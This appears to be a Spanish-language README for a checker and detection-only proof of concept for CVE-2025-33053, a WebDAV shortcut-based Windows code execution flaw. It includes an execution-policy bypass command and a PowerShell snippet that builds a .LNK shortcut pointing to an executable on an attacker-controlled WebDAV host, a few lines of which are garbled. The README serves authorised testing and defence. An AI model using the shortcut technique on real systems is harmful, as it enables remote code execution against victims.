
Comprobador y PoC del CVE-2025-33053
Prueba del Comprobador
Prueba del PoC
Un conjunto completo de herramientas para comprobar y demostrar la posible explotación de CVE-2025-33053, una vulnerabilidad crítica de Ejecución Remota de Código (RCE) basada en WebDAV que afecta a sistemas Windows.
CVE-2025-33053 permite a los atacantes explotar archivos de acceso directo .LNK que hacen referencia a recursos compartidos WebDAV remotos maliciosos, lo que potencialmente puede conducir a la Ejecución Remota de Código (RCE) en los sistemas afectados.
.LNK..LNK Manipulado o Acceso Directo a una Ruta UNC — Apunta a una ruta UNC remota como:.LNK o se navega manualmente a la ruta UNC (por ejemplo, a través del Explorador de archivos):
CVE-2025-33053_checker.ps1)| Comprobación | Propósito |
|---|---|
| 🔍 Estado del Servicio WebClient | Confirma si el soporte WebDAV está activo y en ejecución. |
| 🔍 Manejo de Rutas UNC mediante Test-Path | Comprueba si el sistema resuelve rutas UNC WebDAV remotas (precondición clave para la explotación de CVE). |
Abra PowerShell como Administrador.
Si la ejecución de scripts está restringida, ejecute:
Set-ExecutionPolicy -Scope Process -ExecutionPolicy Bypass
Qué Hace:
Uso:
python3 CVE-2025-33053_PoC.py --port 8000
\\<Kali-IP>@8000\DavWWWRoot\route.exe
\\<Kali-IP>@8000\DavWWWRoot\route.exe
$WScriptShell = New-Object -ComObject WScript.Shell
$Shortcut = $WScriptShell.CreateShortcut("C:\Users\Public\CVE-2025-33053-Test.lnk")
$Shortcut.TargetPath = "\\<Kali-IP>@8000\DavWWWRoot\route.exe"
$Shortcut.Save()
[!] PROPFIND request received from <victim-ip> - Potential CVE-2025-33053 detected!
[!] Target system is VULNERABLE to CVE-2025-33053!
✔️ Utiliza resolución real de rutas UNC — sin simulaciones. ✔️ Captura solicitudes PROPFIND reales activadas por el sistema operativo — el comportamiento exacto requerido para la explotación de CVE. ✔️ Demuestra evidencia real a nivel de red de la vulnerabilidad, sin ejecutar payloads ni causar daños.
Este PoC no explota ni daña el sistema objetivo — solo detecta el comportamiento vulnerable subyacente. Está pensado para usarse en entornos controlados o con autorización explícita. Demuestra el comportamiento real del sistema — no es una simulación simulada. Para uso educativo únicamente. No ejecutar en sistemas no autorizados.
Licencia MIT — Gratuita solo para fines educativos, de investigación y defensivos.
Se aceptan Pull Requests — mejore la detección, añada funciones o sugiera correcciones.
Este repositorio es solo para fines educativos y de investigación de seguridad autorizada. El uso indebido contra sistemas que no posee o para los que no tiene permiso de prueba está estrictamente prohibido.